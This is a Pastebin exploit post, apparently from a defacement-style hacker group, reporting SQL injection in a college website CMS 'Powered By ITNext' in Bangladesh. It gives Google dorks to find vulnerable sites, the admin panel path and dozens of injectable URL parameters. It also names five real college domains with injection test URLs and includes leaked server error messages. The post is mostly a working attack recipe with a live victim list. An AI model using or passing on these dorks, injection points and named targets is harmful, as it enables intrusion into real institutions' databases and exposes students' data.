KingSkrupellos

Powered By ITNext Bangladesh Solutions Limited SQL Injection

Jan 7th, 2019
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.75 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Powered By ITNext Bangladesh Solutions Limited SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/01/2019
  7. # Vendor Homepage : itnext.com.bd ~ edu-bd.org
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''This is Web-App Not Only A Website!!!
  12. Powered By ITNext>>'' site:edu.bd
  13. intext:''Powered By ITNext>>'' site:edu.bd
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # Cyberizm Exploit Reference Link :
  17. cyberizm.org/cyberizm-itnext-bangladesh-solutions-limited-sql-injection.html
  18. # CXSecurity Exploit Reference Link :
  19. cxsecurity.com/issue/WLB-2019010042
  20.  
  21. ###################################################################
  22.  
  23. # Admin Panel Login Path :
  24. *************************
  25.  
  26. /index.php?cat=quicklink&del=login
  27.  
  28. # SQL Injection Exploits :
  29. ***********************
  30.  
  31. /admission/index.php?cat=[SQL Injection]
  32.  
  33. /index.php?cat=quicklink&del=[SQL Injection]
  34.  
  35. /index.php?cat=Home&del=[SQL Injection]
  36.  
  37. /index.php?cat=Principal&del=[SQL Injection]
  38.  
  39. /index.php?cat=Vice%20Principal&del=[SQL Injection]
  40.  
  41. /index.php?cat=Teachers&del=[SQL Injection]
  42.  
  43. /index.php?cat=Students&del=[SQL Injection]
  44.  
  45. /index.php?cat=Brief%20History&del=[SQL Injection]
  46.  
  47. /index.php?cat=Tuition%20Fees&del=[SQL Injection]
  48.  
  49. /index.php?cat=Attendence&del=[SQL Injection]
  50.  
  51. /index.php?cat=List%20of%20Holiday&del=[SQL Injection]
  52.  
  53. /index.php?cat=Class%20Schedule&del=[SQL Injection]
  54.  
  55. /index.php?cat=Academic%20Calander&del=[SQL Injection]
  56.  
  57. /index.php?cat=Admission%20Fees&del=[SQL Injection]
  58.  
  59. /index.php?cat=Admission%20Open&del=[SQL Injection]
  60.  
  61. /index.php?cat=Laboratory&del=[SQL Injection]
  62.  
  63. /index.php?cat=Computer%20Lab&del=[SQL Injection]
  64.  
  65. /index.php?cat=College%20Library&del=[SQL Injection]
  66.  
  67. /index.php?cat=ACADEMIC&del=[SQL Injection]
  68.  
  69. /index.php?cat=ADMISSION&del=[SQL Injection]
  70.  
  71. /index.php?cat=Check%20Dues&del=[SQL Injection]
  72.  
  73. /index.php?cat=Online%20Payments&del=[SQL Injection]
  74.  
  75. /index.php?cat=News%20Corner&del=[SQL Injection]
  76.  
  77. /index.php?cat=Notice%20Board&del=[SQL Injection]
  78.  
  79. /index.php?cat=Photo%20Gallery&del=[SQL Injection]
  80.  
  81. /index.php?cat=Email%20Us&del=[SQL Injection]
  82.  
  83. /index.php?cat=Find%20Us&del=[SQL Injection]
  84.  
  85. ###################################################################
  86.  
  87. # Example Vulnerable Sites =>
  88. ***************************
  89.  
  90. Note => (107.155.116.175) => There are 14 domains hosted on this server.
  91.  
  92. [+] mohsincollege.edu.bd/index.php?cat=quicklink&del=1%27
  93.  
  94. => [ Proof of Concept for SQL Injection ] => archive.vn/xBSoT
  95.  
  96. [+] ramucollege.edu.bd/admission/index.php?cat=1'
  97.  
  98. [+] bakoliagovcollege.edu.bd/index.php?cat=quicklink&del=1%27
  99.  
  100. [+] pol-inst-cmp.edu.bd/index.php?cat=quicklink&del=1%27
  101.  
  102. [+] cgc.edu.bd/index.php?cat=quicklink&del=1%27
  103.  
  104. ###################################################################
  105.  
  106. # SQL Database Error :
  107. *********************
  108.  
  109. Warning: include(pages/1'.php): failed to open stream:
  110. No such file or directory in /home/mcollege/public_html/index.php on line 426
  111.  
  112. Warning: include(): Failed opening 'pages/1'.php' for inclusion
  113. (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mcollege/public_html/index.php on line 426
  114.  
  115. Warning: mysql_connect(): Access denied for user 'root'@'localhost'
  116.  
  117. (using password: YES) in /home/ramucollege/public_html/admission/db_connect.php on line 22
  118.  
  119. ###################################################################
  120.  
  121. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  122.  
  123. ###################################################################
Add Comment
Please, Sign In to add comment